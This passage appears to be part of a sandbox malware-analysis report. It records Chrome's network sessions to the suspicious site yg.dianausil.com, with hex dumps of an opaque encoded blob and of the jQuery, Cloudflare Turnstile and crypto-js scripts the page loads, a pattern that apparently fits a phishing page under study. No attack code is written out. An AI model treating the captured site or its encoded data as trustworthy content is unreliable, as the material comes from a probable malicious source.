                                                                      2025-03-19 10:30:04 UTC1369INData Raw: 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34
                                                                      Data Ascii: 6g776g776g44Wk776g44Wk776g776g776g776g776g44Wk776g776g776g44Wk776g776g44Wk44Wk776g44Wk776g44Wk44Wk776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk44Wk44Wk776g776g44Wk776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk4
                                                                      2025-03-19 10:30:04 UTC1369INData Raw: 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37
                                                                      Data Ascii: k44Wk776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk776g776g44Wk776g776g44Wk776g44Wk44Wk44Wk776g44Wk776g776g776g44Wk776g776g44Wk44Wk44Wk44Wk776g44Wk776g776g776g44Wk44Wk44Wk776g44Wk44Wk776g44Wk776g44Wk44Wk776g44Wk776g776g776g77
                                                                      2025-03-19 10:30:04 UTC1369INData Raw: 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36
                                                                      Data Ascii: 776g776g776g44Wk776g44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk776g776g776g776g776g44Wk776g776g44Wk776g776g776g776g776g776g776g44Wk44Wk44Wk44Wk776g44Wk776g776g44Wk776g776g776g776g776g776g44Wk776g44Wk44Wk776g44Wk44Wk776g776g776g776g44Wk776g44Wk776g776g776g44Wk776
                                                                      2025-03-19 10:30:04 UTC1369INData Raw: 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67
                                                                      Data Ascii: 4Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk44Wk44Wk776g44Wk44Wk776g776g


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.649741151.101.66.1374431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:05 UTC663OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                      Host: code.jquery.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://yg.dianausil.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:30:05 UTC612INHTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 89501
                                                                      Server: nginx
                                                                      Content-Type: application/javascript; charset=utf-8
                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                      ETag: "28feccc0-15d9d"
                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                      Accept-Ranges: bytes
                                                                      Date: Wed, 19 Mar 2025 10:30:05 GMT
                                                                      Age: 3621806
                                                                      X-Served-By: cache-lga21931-LGA, cache-fra-eddf8230148-FRA
                                                                      X-Cache: MISS, HIT
                                                                      X-Cache-Hits: 0, 68
                                                                      X-Timer: S1742380205.322235,VS0,VE0
                                                                      Vary: Accept-Encoding
                                                                      2025-03-19 10:30:05 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                      2025-03-19 10:30:05 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                      2025-03-19 10:30:05 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                      2025-03-19 10:30:05 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                      2025-03-19 10:30:05 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                      2025-03-19 10:30:05 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.649743104.18.95.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:05 UTC704OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://yg.dianausil.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:30:05 UTC386INHTTP/1.1 302 Found
                                                                      Date: Wed, 19 Mar 2025 10:30:05 GMT
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                      cross-origin-resource-policy: cross-origin
                                                                      location: /turnstile/v0/g/f3b948d8acb8/api.js
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4adb78c4699f-FRA
                                                                      alt-svc: h3=":443"; ma=86400


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.649742104.17.25.144431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:05 UTC691OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                      Host: cdnjs.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://yg.dianausil.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:30:05 UTC959INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:30:05 GMT
                                                                      Content-Type: application/javascript; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Access-Control-Allow-Origin: *
                                                                      Cache-Control: public, max-age=30672000
                                                                      ETag: W/"64972557-40eb"
                                                                      Last-Modified: Sat, 24 Jun 2023 17:18:15 GMT
                                                                      cf-cdnjs-via: cfworker/r2
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Timing-Allow-Origin: *
                                                                      X-Content-Type-Options: nosniff
                                                                      CF-Cache-Status: HIT
                                                                      Age: 1160195
                                                                      Expires: Mon, 09 Mar 2026 10:30:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dfYdyRlT%2Fc3nSSJ7fhDaxSo%2FSMhVZqvdCJUCIZUQhAiJt3GBokBk6yxzbi0xBrt00ZczQf24Uf0M7HFJOpKoa4vs4xcI9DWkTBHQIZicmosRzfUGq6%2BE30WjR3JKAQAT7v8455mJ"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                      Strict-Transport-Security: max-age=15780000
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4adb7a631e5a-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:30:05 UTC410INData Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                      Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                                      Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                                      Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                                      Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                                      Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
